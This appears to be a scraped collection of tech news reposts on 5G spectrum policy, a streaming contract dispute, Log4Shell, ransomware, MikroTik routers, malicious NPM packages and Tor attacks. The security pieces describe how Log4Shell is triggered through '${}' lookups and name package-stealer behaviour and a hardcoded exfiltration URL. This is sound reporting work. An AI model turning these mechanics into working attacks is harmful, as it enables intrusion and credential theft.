Categories
Tech

Ajit Pai and Tom Wheeler agree: The FAA is behaving badly in battle against FCC

Then-Federal Communications Commission Chairman Tom Wheeler and FCC Commissioner Ajit Pai smiling and talking to each other before a Congressional hearing.
Enlarge / Then-Federal Communications Commission Chairman Tom Wheeler (L) and FCC Commissioner Ajit Pai talk before testifying to the House Judiciary Committee on March 25, 2015 in Washington, DC.

Six former chairs of the Federal Communications Commission yesterday criticized the Federal Aviation Administration’s fight against a new 5G rollout on spectrum that the FCC has studied and deemed safe to use. Republicans Ajit Pai and Michael Powell joined with Democrats Tom Wheeler, Mignon Clyburn, Julius Genachowski, and Michael Copps in writing a letter describing their concerns about how the FAA has tried to undermine public confidence in the FCC’s decision-making process.

“The FAA should work with the FCC and the National Telecommunications and Information Administration (NTIA)… to assess and resolve the FAA’s concerns expeditiously, but this debate should not be fought publicly in a way that undermines consumer confidence in the process, nor should it require months of additional delays,” said the six former chairs’ letter, which was sent to FCC Chairwoman Jessica Rosenworcel and NTIA acting Administrator Evelyn Remaley.

The “FAA position threatens to derail the reasoned conclusions reached by the FCC after years of technical analysis and study,” the former chairs also wrote.

AT&T and Verizon have already delayed their 5G launches on the new spectrum to assuage the FAA’s concerns, but the carriers plan to move ahead with the deployments next month.

No evidence of harm

Nearly 40 other countries are using C-band spectrum for 5G without any reports of interference to airplanes’ radio altimeters. As we wrote previously, the FCC in February 2020 approved mobile carriers’ use of C-Band spectrum from 3.7 to 3.98 GHz only after analyzing the aviation industry’s interference claims and finding no credible evidence of harm to altimeters, which use spectrum from 4.2 to 4.4 GHz.

To be safe, the FCC required carriers to follow power limits and created a 220 MHz guard band that will remain unused to protect altimeters from any possible interference from 5G transmissions. The FCC decision said the aviation industry’s research was unrealistic and that “well-designed equipment should not ordinarily receive any significant interference (let alone harmful interference) given these circumstances.”

Over a year after the aviation industry’s objections were dismissed by the FCC due to a lack of evidence, unnamed FAA officials tried to revive the debate by leaking their concerns to The Wall Street Journal. The FAA followed that up by issuing a November 2 bulletin that warned of “potential adverse effects on radio altimeters” even though the FAA bulletin acknowledged there have been no “proven reports of harmful interference” in the many countries where this spectrum is already used.

Former chairs say FCC acted on the evidence

The former FCC chairs’ letter said the agency’s 2020 decision on C-band spectrum “followed almost two years of careful review of the public record,” during which other federal agencies were given the chance “to raise—and defend with reliable data—their concerns about interference from transitioning spectrum to new uses.”

“At the end of this process, an FCC decision is reached that reflects the input of all stakeholders and its technical experts on the effective transition of spectrum, consistent with its statutory charge to ensure that new systems do not cause harmful interference,” the former chairs wrote. “In turn, this decision-making approach provides wireless companies or other license holders with the confidence necessary to invest in the networks that will deliver the innovation that will ensure the US remains the technology leader of the world.”

That’s how it’s supposed to work, but the FAA actions threaten to derail the process, the letter concluded:

In this case, the FAA position threatens to derail the reasoned conclusions reached by the FCC after years of technical analysis and study. We encourage all stakeholders to work together toward a speedy resolution of the issues in this band, and to ensure these surprises do not become a recurring feature of American spectrum management in the future.

Credit: Source link

Categories
Tech

YouTube TV warns it may lose all Disney-owned channels amid contract dispute

YouTube app icon on a TV screen.

Getty Images | Chris McGrath

YouTube TV yesterday warned that it could lose all Disney-owned channels after Friday because of a contract dispute and said it will temporarily reduce its price by $15 a month if that happens.

“We’re now in negotiations with Disney to continue distributing their content on YouTube TV so you can continue watching everything from your favorite teams on ESPN to The Bachelor to Good Morning America. Our deal expires on Friday, December 17, and we haven’t been able to reach an equitable agreement yet, so we wanted to give you an early heads up so that you can understand your choices,” the Google-owned YouTube wrote in a blog post.

“[I]f we are unable to reach a deal by Friday, the Disney-owned channels will no longer be available on YouTube TV and we will decrease our monthly price by $15, from $64.99 to $49.99 (while this content remains off our platform),” the blog post said. YouTube noted that users can pause or cancel their YouTube TV subscriptions at any time and subscribe to the Disney Bundle for $13.99 a month.

YouTube’s statement that it wants “equitable” terms indicates that it is seeking a most-favored-nation (MFN) clause from Disney. “Our ask to Disney, as with all our partners, is to treat YouTube TV like any other TV provider—by offering us the same rates that services of a similar size pay, across Disney’s channels for as long as we carry them. If Disney offers us equitable terms, we’ll renew our agreement with them,” YouTube wrote.

When contacted by Ars, Disney said that the contract is scheduled to expire on Friday at 11:59 pm ET and covers “the ABC Owned Television Stations, the ESPN networks, the Disney channels, Freeform, the FX networks, and the National Geographic channels.” Disney expressed confidence that the companies can avoid a blackout:

Disney Media and Entertainment Distribution has a highly successful track record of negotiating such agreements with providers of all types and sizes across the country and is committed to working with Google to reach a fair, market-based agreement. We are optimistic that we can reach a deal and continue to provide their YouTube TV customers with our live sporting events and news coverage, plus kids, family, and general entertainment programming.

YouTube settled disputes with NBC and Roku

YouTube’s demand for an MFN clause was also one of the sticking points in its recent dispute with the Comcast-owned NBCUniversal. In that case, the companies had to agree to a short extension to avoid a blackout when the original contract expired. One day later, they announced a multiyear deal to keep NBC on YouTube TV.

The YouTube/NBC negotiations were contentious partly because NBCUniversal asked YouTube TV to bundle Peacock, the NBC streaming service that has apparently failed to get many paying subscribers. A Disney spokesperson told Ars that Disney did not ask YouTube TV to bundle Disney+.

A recent dispute between Roku and Google resulted in the YouTube TV app being pulled from the Roku Channel Store. Google and Roku reached a deal to end that impasse last week, one day before the regular YouTube app would have been removed from the Roku store.

Credit: Source link

Categories
Tech

Hackers launch over 840,000 attacks through Log4J flaw

Hackers launch over 840,000 attacks through Log4J flaw

Matejmo | Getty Images


Hackers including Chinese state-backed groups have launched more than 840,000 attacks on companies globally since last Friday, according to researchers, through a previously unnoticed vulnerability in a widely used piece of open-source software called Log4J.

Cyber security group Check Point said the attacks relating to the vulnerability had accelerated in the 72 hours since Friday, and that at some points its researchers were seeing more than 100 attacks a minute.

Perpetrators include “Chinese government attackers,” according to Charles Carmakal, chief technology officer of cyber company Mandiant.

The flaw in Log4J allows attackers to easily gain remote control over computers running apps in Java, a popular programming language.

Jen Easterly, director of the US Cybersecurity and Infrastructure Security Agency (CISA), told industry executives that the vulnerability was “one of the most serious I’ve seen in my entire career, if not the most serious,” according to US media reports. Hundreds of millions of devices are likely to be affected, she said.

Check Point said that in many cases, the hackers were taking control of computers to use them to mine cryptocurrency, or to become part of botnets, vast networks of computers that can be used to overwhelm websites with traffic, to send spam, or for other illegal purposes.

Both CISA and the UK’s National Cyber Security Centre have now issued alerts urging organizations to make upgrades related to the Log4J vulnerability, as experts attempt to assess the fallout. Amazon, Apple, IBM, Microsoft, and Cisco are among those that have rushed to put out fixes, but no severe breaches have been reported publicly so far.

The vulnerability is the latest to hit corporate networks, after the emergence of flaws in the past year in commonly used software from Microsoft and IT company SolarWinds. Both these weaknesses were initially exploited by state-backed espionage groups from China and Russia respectively.

Mandiant’s Carmakal said that Chinese state-backed actors were also attempting to exploit the Log4J bug but declined to share further details. Researchers at SentinelOne have also told media that they have observed Chinese hackers taking advantage of the vulnerability.

According to Check Point, nearly half of all attacks have been conducted by known cyber attackers. These included groups using Tsunami and Mirai—malware that turns devices into botnets, or networks used to launch remotely controlled hacks such as denial of service attacks. It also included groups using XMRig, a software that mines the hard-to-trace digital currency Monero.

“With this vulnerability, attackers gain almost unlimited power—they can extract sensitive data, upload files to the server, delete data, install ransomware or pivot to other servers,” Nicholas Sciberras, head of engineering at vulnerability scanner Acunetix, said. It was “astonishingly easy” to deploy an attack, he said, adding that it would “be exploited for months to come.”

The source of the vulnerability is faulty code developed by unpaid volunteers at the non-profit Apache Software Foundation, which runs multiple open source projects, raising questions about the security of vital parts of IT infrastructure. Log4J has been downloaded millions of times.

The flaw has existed unnoticed since 2013, experts say. Matthew Prince, chief executive of cyber group Cloudflare, said it started to be actively exploited from December 1, although there was no “evidence of mass exploitation until after public disclosure” from Apache the following week.

© 2021 The Financial Times Ltd. All rights reserved Not to be redistributed, copied, or modified in any way.

Credit: Source link

Categories
Tech

As Log4Shell wreaks havoc, payroll service reports ransomware attack

As Log4Shell wreaks havoc, payroll service reports ransomware attack

Getty Images

As the world is beset by Log4Shell, arguably the most severe vulnerability ever, one of the biggest human resources solutions providers is reporting a ransomware attack that has taken its systems offline, possibly for the next several weeks. So far, the company isn’t saying if that critical vulnerability was the means hackers used to breach the systems.

The company said on Sunday that services using the Kronos Private Cloud had been unavailable for the past day, with the attack taking down Kronos’ UKG Workforce Central, UKG TeleStaff, and Banking Scheduling Solutions services.

“At this time, we still do not have an estimated restoration time, and it is likely that the issue may require at least several days to resolve,” Kronos representative Leo Daley wrote. “We continue to recommend that our impacted customers evaluate alternative plans to process time and attendance data for payroll processing, to manage schedules, and to manage other related operations important to their organization.”

Ten hours after that advisory, Daley published an update reporting that the cause of the outage was ransomware and that it “may take up to several weeks to restore system availability.”

“We deeply regret the impact this is having on you, and we are continuing to take all appropriate actions to remediate the situation,” the Kronos representative wrote. “We recognize the seriousness of this issue and will provide another update within the next 24 hours.”

Neither advisory made any mention of the method the ransomware attackers used to breach the Kronos infrastructure. A banner notice at the top of each post, however, stated:

We are aware of the log4j vulnerability reported as CVE-2021-44228. We have preventative controls in our environments to detect and prevent exploitation attempts. We have invoked emergency patching processes to identify and upgrade impacted versions of log4j. We are aware of the widespread usage of log4j in the software industry and are actively monitoring our software supply chain for any advisories of 3rd party software that may be impacted by this vulnerability.

Kronos representatives responding to an email declined to say if a Log4Shell exploit against its systems was the cause of the initial compromise. It wouldn’t be a stretch, though, for that to be the case. Kronos cloud services rely heavily on Java, the software framework that Log4J is based on. The Log4Shell vulnerability, which gives hackers the ability to execute malicious code with elevated system privileges, is trivial to exploit. Often, attacks can come from users visiting a page with a browser that includes plaintext commands in the user agent.

Kronos said it had retained cybersecurity experts and has notified authorities. It said customers’ on-premises services aren’t affected.

Separately, the IT arm of the Virginia state legislature reported suffering a ransomware attack that occurred on late Friday, the Associated press reported. The Legislative Automated Systems in 2019 purchased Java licenses, an indication that the IT group uses the software framework. While it’s unknown what the vector was for the breach, both its timing and the use of Java are consistent with the possibility Log4Shell played a key role.

This post will be updated with any new information that comes to light.

Post updated to add detail about Virginia legislature ransomware attack.

Credit: Source link

Categories
Tech

The Log4Shell zeroday 4 days on. What is it and how bad is it really?

The Log4Shell zeroday 4 days on. What is it and how bad is it really?

Log4Shell is the name given to a critical zeroday vulnerability that surfaced on Thursday when it was exploited in the wild in remote-code compromises against Minecraft servers. The source of the vulnerability was Log4J, a logging utility used by thousands if not millions of apps, including those used inside just about every enterprise on the planet. The Minecraft servers were the proverbial canary in the coal mine.

In the four days since, it’s clear Log4Shell is every bit as grave a threat as I claimed, with the list of cloud services affected reading like a who’s who of biggest names on the Internet. Threat analysts and researchers are still assessing the damage so far and the outlook over the next weeks and months. Here’s what you need to know for now.

What’s Log4J and what makes Log4Shell such a big deal? Log4J is an open-source Java-based logging tool available from Apache. It has the ability to perform network lookups using the Java Naming and Directory Interface to obtain services from the Lightweight Directory Access Protocol. The end result: Log4j will interpret a log message as a URL, go and fetch it, and even execute any executable payload it contains with the full privileges of the main program. Exploits are triggered inside text using the ${} syntax, allowing them to be included in browser user agents or other commonly-logged attributes.

Here’s what exploits look like, as illustrated by Juniper Networks researchers:

Juniper Networks

The vulnerability, tracked as CVE-2021-44228, has a severity rating of 10 out of 10. The zeroday has been exploited at least nine days before it surfaced.

Researchers at Cisco’s Talos security team said they observed exploits beginning December 2.

What has happened since Log4Shell surfaced last Thursday? Almost immediately, security firm Greynoise detected active scanning attempting to identify vulnerable servers. Researchers report seeing this critical and easy-to-exploit vulnerability being used to install crypto-mining malware, bolster Linux botnets, and exfiltrate configurations, environmental variables, and other potentially sensitive data from vulnerable servers.

What’s the prognosis? In a best-case scenario, major brokerages, banks, and merchants will invest huge sums in overtime costs to pay large numbers of already overworked IT employees to mop up this mess during the holidays. You don’t want to think about the worst-case scenario, other than to remember the 2017 breach of Equifax, and the resulting compromise of 143 million US consumers’ data that followed when that company failed to patch against a similarly devastating vulnerability.

Sounds bad. What should I do? Yeah, it is. If an end user, there’s not much you can do other than to hound the services you use and ask what they’re doing to keep the data you entrust with them secure. The most useful thing the cloud services can do is to update Log4J. But for large enterprises, it’s often not that simple. Dozens of security companies have published guidance. Advice from Microsoft and Sophos is here and here.


Credit: Source link

Categories
Tech

The Internet’s biggest players are all affected by critical Log4Shell 0-day

The Internet’s biggest players are all affected by critical Log4Shell 0-day

The list of services with Internet-facing infrastructure that is vulnerable to a critical zero-day vulnerability in the open source Log4j logging utility is immense and reads like a who’s who of the biggest names on the Internet, including Apple, Amazon, Cloudflare, Steam, Tesla, Twitter, and Baidu.

The vulnerability, now going by the name Log4Shell, came to light on Thursday afternoon, when several Minecraft services and news sites warned of actively circulating attack code that exploited the vulnerability to execute malicious code on servers and clients running the world’s bestselling game. Soon, it became clear that Minecraft was only one of likely thousands of big-name services that can be felled by similar attacks.

A compilation of screenshots posted online documents how some of the world’s most popular and trusted cloud-based services react when they are fed parameters used in the attack. To wit:

The images use a domain name system leak detection service called dnslog.cn to see if the target cloud service is performing a DNS lookup. Each images shows that service is accepting connections from an attacker-controlled machine (as evidenced by the IP connection log).

“Normally, typing something into a username box should never be making any external network connections, so the fact that it does proves that Log4j is being used here and therefore that the server may be vulnerable to the remote code execution attack,” Ars reader skizzerz explained in the comments below.

While the images show the services responding in unintended and potentially dangerous ways to the user input, the services aren’t automatically vulnerable to the types of code-execution attacks that compromised Minecraft servers. That’s because these services typically have multiple layers of defense. If one layer fails, additional layers are often available to lessen or completely eliminate any real damage.

Then again, the images demonstrate that unauthorized people can exploit Log4Shell to access the servers of the some of the world’s most powerful corporations in ways they never intended. Asked about the access to Apple servers, Malwarebytes director of Mac offerings Thomas Reed said: “This is far worse than if individual devices were vulnerable, and I think it’s an open question at this point exactly what kind of data attackers are probably pulling from Apple’s services as we speak.” Apple representatives didn’t respond to an email seeking comment.

Cloudflare, meanwhile, said in a post that it has taken steps to block attacks on its network and against its customers. Cloudflare Chief Security Officer Joe Sullivan said his team has been unable to reproduce the behavior depicted in the image and doesn’t recognize the IP addresses shown.

Minecraft on Friday rolled out a fix.

The takeaway is that it’s too early now to say these services aren’t vulnerable. For the time being, people should remain wary and await guidance from affected providers.

Listing image by Jeffrey Coolidge / Getty Images

Credit: Source link

Categories
Tech

Zeroday in ubiquitous Log4j tool poses a grave threat to the Internet

Zeroday in ubiquitous Log4j  tool poses a grave threat to the Internet

Getty Images

Exploit code has been released for a serious code-execution vulnerability in Log4j, an open-source logging utility that’s used in countless apps, including those used by large enterprise organizations, several websites reported on last Thursday.

Word of the vulnerability first came to light on sites catering to users of Minecraft, the best-selling game of all time. The sites warned that hackers could execute malicious code on servers or clients running the Java version of Minecraft by manipulating log messages, including from things typed in chat messages. The picture became more dire still as Log4j was identified as the source of the vulnerability and exploit code was discovered posted online.

A big deal

“The Minecraft side seems like a perfect storm, but I suspect we are going to see affected applications and devices continue to be identified for a long time,” HD Moore, founder and CTO of network discovery platform Rumble, said. “This is a big deal for environments tied to older Java runtimes: Web front ends for various network appliances, older application environments using legacy APIs, and Minecraft servers, due to their dependency on older versions for mod compatibility.”

There already are reports servers performing Internet-wide scans in attempts to locate vulnerable servers.

Log4j is incorporated into a host of popular frameworks, including Apache Struts2, Apache Solr, Apache Druid, and Apache Flink. That means that a dizzying number of third-party apps may also be vulnerable to exploits that carry the same high severity as those threatening Minecraft users.

At the time this post went live, there wasn’t much known about the vulnerability. One of the few early sources providing a tracking number for the vulnerability was Github, which said it’s CVE-2021-44228. Security firm Cyber Kendra on late Thursday reported a Log4j RCE Zero day being dropped on the Internet and concurred with Moore that “there are currently many popular systems on the market that are affected.”

The Apache Foundation has yet to disclose the vulnerability, and representatives there didn’t respond to an email. This Apache page does acknowledge the recent fixing of a serious vulnerability. Moore and other researchers said the Java deserialization bug stems from Log4j making network requests through the JNDI to an LDAP server and executing any code that’s returned. The bug is triggered inside of log messages with use of the ${} syntax.

Additional reporting from security firm LunaSec said that Java versions greater than 6u211, 7u201, 8u191, and 11.0.1 aren’t affected by this attack vector. In these versions the JNDI can’t load a remote codebase using LDAP.

LunaSec went on to say that cloud services from Steam and Apple iCloud have also been found to be affected. Company researchers also pointed out that a different high-severity vulnerability in struts led to the 2017 compromise of Equifax, which spilled sensitive details for more than 143 million US consumers.

Cyber Kendra said that in November the Alibaba Cloud security team disclosed a vulnerability in Log4j2—the successor to Log4j—that stemmed from recursive analysis functions, which attackers could exploit by constructing malicious requests that triggered remote code execution. The firm strongly urged people to use the latest version of Log4j2 available here.

What it means for Minecraft

The Spigot gaming forum said that Minecraft versions 1.8.8 through the most current 1.18 release are all vulnerable, as did other popular game servers such as Wynncraft. Gaming server and news site Hypixel, meanwhile, urged Minecraft players to take extra care.

“The issue can allow remote access to your computer through the servers you log into,” site representatives wrote. “That means any public server you go onto creates a risk of being hacked.”

Reproducing exploits for this vulnerability in Minecraft aren’t straightforward because success depends not only on the Minecraft version running but also the version of the Java framework the Minecraft app is running on top of. It appears that older Java versions have fewer built-in security protections that make exploits easier.

Spigot and other sources have said that adding the JVM flag -Dlog4j2.formatMsgNoLookups=true neutralizes the threat for most Java versions. Spigot and many other services have already inserted the flag into the games they make available to users.

To add the flag users should go to their launcher, open the installations tab, select the installation in use and click “…” > “Edit” > “MORE OPTIONS”, and paste -Dlog4j2.formatMsgNoLookups=true at the end of the JVM flags.

For the time being, people should pay close attention to this vulnerability and its potential to trigger high-impact attacks against a wide variety of apps and services. For Minecraft users, that means steering clear of unknown servers or untrustworthy users. For users of open-source software, it means checking to see if it relies on Log4j or Log4j2 for logging. This is a breaking story. Updates will follow if more information becomes available.


Credit: Source link

Categories
Tech

300,000 MikroTik routers are ticking security time bombs, researchers say

300,000 MikroTik routers are ticking security time bombs, researchers say

Getty Images

As many as 300,000 routers made by Latvia-based MikroTik are vulnerable to remote attacks that can surreptitiously corral the devices into botnets that steal sensitive user data and participate in Internet-crippling DDoS attacks, researchers said.

The estimate, made by researchers at security firm Eclypsium, is based on Internet-wide scans that searched for MikroTik devices using firmware versions known to contain vulnerabilities that were discovered over the past three years. While the manufacturer has released patches, the Eclypsium research shows that a significant proportion of users has yet to install them.

“Given the challenges of updating MikroTik, there are large numbers of devices with these 2018 and 2019 vulnerabilities,” Eclypsium researchers wrote in a post. “Collectively, this gives attackers many opportunities to gain full control over very powerful devices, positioning them to be able to target devices both behind the LAN port as well as target other devices on the Internet.”

Embraced by script kiddies and nation-states alike

The concern is far from theoretical. In early 2018, researchers at security firm Kaspersky said that a powerful nation-state malware called Slingshot, which had gone undetected for six years, initially spread through MikroTik routers. The attacks downloaded malicious files from vulnerable routers by abusing a MikroTik configuration utility known as Winbox, which transferred the payloads from the device file system to a connected computer.

A few months later, researchers at security firm Trustwave discovered two malware campaigns against MikroTik routers after reverse engineering a CIA tool leaked in a WikiLeaks series known as Vault7.

Also in 2018, China’s Netlab 360 reported that thousands of MikroTik routers had been swept into a botnet by malware attacking a vulnerability tracked as CVE-2018-14847.

The Eclypsium researchers said that CVE-2018-14847 is one of at least three high-severity vulnerabilities that remains unpatched in the Internet-connected MikroTik devices they tracked. Combined with two other vulnerabilities located in Winbox—CVE-2019-3977 and CVE-2019-3978—Eclypsium found 300,000 vulnerable devices. Once hackers infect a device, they typically use it to launch further attacks, steal user data, or participate in distributed denial-of-service attacks.

The researchers have released a free software tool that people can use to detect if their MikroTik device is either vulnerable or infected. The company also provides other suggestions for locking down the devices. As always, the best way to secure a device is to ensure it’s running the latest firmware. It’s also important to replace default passwords with strong ones and turn off remote administration unless it’s necessary.

Credit: Source link

Categories
Tech

Malicious NPM packages are part of a malware “barrage” hitting repositories

Malicious NPM packages are part of a malware “barrage” hitting repositories

Researchers have found another 17 malicious packages in an open source repository, as the use of such repositories to spread malware continues to flourish.

This time, the malicious code was found in NPM, where 11 million developers trade more than 1 million packages among each other. Many of the 17 malicious packages appear to have been spread by different threat actors who used varying techniques and amounts of effort to trick developers into downloading malicious wares instead of the benign ones intended.

This latest discovery continues a trend first spotted a few years ago, in which miscreants sneak information stealers, keyloggers, or other types of malware into packages available in NPM, RubyGems, PyPi, or another repository. In many cases, the malicious package has a name that’s a single letter different than a legitimate package. Often, the malicious package includes the same code and functionality as the package being impersonated and adds concealed code that carries out additional nefarious actions.

A ripe attack vector

“We are witnessing a recent barrage of malicious software hosted and delivered through open-source software repositories,” JFrog researchers Andrey Polkovnychenko and Shachar Menashe wrote on Wednesday. “Public repositories have become a handy instrument for malware distribution: the repository’s server is a trusted resource, and communication with it does not raise the suspicion of any antivirus or firewall. In addition, the ease of installation via automation tools such as the npm client, provides a ripe attack vector.”

Most of the packages JFrog flagged stole credentials or other information for Discord servers. Discord has become a popular platform for people to communicate through text, voice, and video. Compromised servers can be used as command and control channels for botnets or as a proxy when downloading data from a hacked server. Some packages stole credit card data associated with hacked Discord accounts.

Two packages—discord-lofy and discord-selfbot-v14—came from an author using the name davisousa. They masquerade as modifications of the popular legitimate library discord.js, which enables interaction with the Discord API. The malware incorporates the original discord.js library as its base and then injects obfuscated malicious code into one of the package files.

The JFrog researchers wrote:

The obfuscated version of the code is enormous: more than 4,000 lines of unreadable code, containing every possible method of obfuscation: mangled variable names, encrypted strings, code flattening and reflected function calls:

Through manual analysis and scripting, we were able to deobfuscate the package and reveal that its final payload is quite straightforward—the payload simply iterates over the local storage folders of well-known browsers (and Discord-specific folders), then searches them for strings looking like a Discord token by using a regular expression. Any found token is sent back via HTTP POST to the hardcoded server https://aba45cf.glitch.me/polarlindo.

Another package named fix-error claimed to to fix errors in a discord “selfbot.” It, too, contained malicious code that had been obfuscated but, in this case, was much easier for the researchers to deobfuscate. The researchers soon determined that the hidden code was a stolen version of the PirateStealer, an app that steals credit card information, login credentials, and other private data stored in a Discord client. It works by injecting malicious Javascript code into the Discord client. The code then “spies” on the user and sends the stolen information to a hardcoded address.

A third example is prerequests-xcode, a package that contains remote access trojan functionality. The researchers wrote:

When inspecting the package’s code, we identified it contains a Node.JS port of
DiscordRAT(originally written in Python) which gives an attacker full control over the victim’s machine. The malware is obfuscated with the popular online tool obfuscator.io, but in this case it is enough to inspect the list of available commands to understand the RAT’s functionality (copied verbatim).

The full list of packages is:

Package Version Payload Infection Method
prerequests-xcode 1.0.4 Remote Access Trojan (RAT) Unknown
discord-selfbot-v14 12.0.3 Discord token grabber Typosquatting/Trojan (discord.js)
discord-lofy 11.5.1 Discord token grabber Typosquatting/Trojan (discord.js)
discordsystem 11.5.1 Discord token grabber Typosquatting/Trojan (discord.js)
discord-vilao 1.0.0 Discord token grabber Typosquatting/Trojan (discord.js)
fix-error 1.0.0 PirateStealer (Discord malware) Trojan
wafer-bind 1.1.2 Environment variable stealer Typosquatting (wafer-*)
wafer-autocomplete 1.25.0 Environment variable stealer Typosquatting (wafer-*)
wafer-beacon 1.3.3 Environment variable stealer Typosquatting (wafer-*)
wafer-caas 1.14.20 Environment variable stealer Typosquatting (wafer-*)
wafer-toggle 1.15.4 Environment variable stealer Typosquatting (wafer-*)
wafer-geolocation 1.2.10 Environment variable stealer Typosquatting (wafer-*)
wafer-image 1.2.2 Environment variable stealer Typosquatting (wafer-*)
wafer-form 1.30.1 Environment variable stealer Typosquatting (wafer-*)
wafer-lightbox 1.5.4 Environment variable stealer Typosquatting (wafer-*)
octavius-public 1.836.609 Environment variable stealer Typosquatting (octavius)
mrg-message-broker 9998.987.376 Environment variable stealer Dependency confusion

As noted earlier, NPM isn’t the only open source repository to be infiltrated with malicious packages. The PyPi repository for Python has seen its share of malware-laden packages, as has RubyGems.

People downloading open source packages should take extra care in making sure the item they’re downloading is legitimate and not malware masquerading as something legitimate. Larger organizations that rely heavily on open source software may find it useful to purchase package management services, which JFrog just happens to sell.

Credit: Source link

Categories
Tech

Tor is under threat from Russian censorship and Sybil attacks

A red line has been drawn through a cartoon megaphone.

The Tor anonymity service and anticensorship tool has come under fire from two threats in recent weeks: The Russian government has blocked most Tor nodes in that country, and hundreds of malicious servers have been relaying traffic.

Russia’s Federal Service for Supervision of Communications, Information Technology, and Mass Media, known as Roskomnadzor, began blocking Tor in the country on Tuesday. The move left Tor users in Russia—said by Tor Project leaders to number about 300,000, or about or 15 percent of Tor users—scrambling to find ways to view sites already blocked and to shield their browsing habits from government investigators.

“Illegal content”

Tor Project managers on early Tuesday said some ISPs in Russia began blocking Tor nodes on December 1 and that Roskomnadzor had threatened to block the main Tor site. A few hours later, the Russian government body made good on those threats.

“The grounds were the spreading of information on the site ensuring the work of services that provide access to illegal content,” Roskomnadzor told the AFP news service on Wednesday in explaining the decision. “Today, access to the resource has been restricted.” The censorship body has previously blocked access to many VPNs that had operated in the country.

Tor managers have responded by creating a mirror site that is still reachable in Russia. The managers are also calling on volunteers to create Tor bridges, which are private nodes that allow people to circumvent censorship. The bridges use a transport system known as obfs4, which disguises traffic so it doesn’t appear related to Tor. As of last month, there were about 900 such bridges.

Many default bridges inside Russia are no longer working, Tor said. “We are calling on everyone to spin up a Tor bridge!” project leaders wrote. “If you’ve ever considered running a bridge, now is an excellent time to get started, as your help is urgently needed.”

Sybil attack

Meanwhile, on Tuesday, security news site The Record reported on findings from a security researcher and Tor node operator that a single, anonymous entity had been running huge numbers of malicious Tor relays. At their peak, the relays reached 900. That can be as much as 10 percent of all nodes.

Tor anonymity works by routing traffic through three separate nodes. The first knows the user’s IP address, and the third knows where the traffic is destined. The middle works as a sort of trusted intermediary so that nodes one and three have no knowledge of each other. Running huge numbers of servers has the potential to break those anonymity guarantees, said Matt Green, an encryption and privacy expert at Johns Hopkins University.

“As long as those three nodes aren’t working together and sharing information, Tor can function normally,” he said. “This breaks down when you have one person pretending to be a bunch of nodes. All [the attackers] have to be is in the first hop or the third hop.” He said that when a single entity operates the first and third nodes, it’s easy to infer the information that is supposed to be obfuscated using the middle node.

Such techniques are often known as Sybil attacks, named after the titular character of a 1970 TV mini-series who suffered from dissociative identity disorder and had 16 distinct personalities. Sybil attacks are an impersonation technique that involves a single entity masquerading as a set of nodes by claiming false identities or generating new identities.

Citing a researcher known as Nusenu, The Record said that at one point, there was a 16 percent chance that a user would enter the Tor network through one of the malicious servers. Meanwhile, there was also a 35 percent chance of passing through one of the malicious middle servers and a 5 percent chance of exiting through one of the servers.

“A very governmenty thing to do”

Nusenu said the malicious relays date back to 2017, and over the years, the person responsible has regularly added large numbers of them. Typically, the unknown person has operated up to hundreds of servers at any given time. The servers are usually hosted in data centers located all over the world and are mostly configured as entry and middle points.

Tor Project leaders told The Record that Tor removed the nodes as soon as it learned of them.

The researcher said that a variety of factors suggests that the nodes are the work of a well-resourced attacker backed by a nation-state. Green agreed and said the most likely culprit would be China or Russia.

“It sounds like a very governmenty thing to do,” Green said. China and Russia “would have no qualms about actively screwing with Tor.”

Tor users can do several things to minimize the damage resulting from rogue nodes. The first is to use TLS-based encryption for the sending of mail and browsing of websites. Browsing anonymous sites that are within Tor hidden services network (aka the Dark Web)—as opposed to using Tor to connect to regular Internet sites and servers—isn’t affected by the threat. Unfortunately, this is frequently not an option for people who want to reach sites that have been blocked through censorship.

Credit: Source link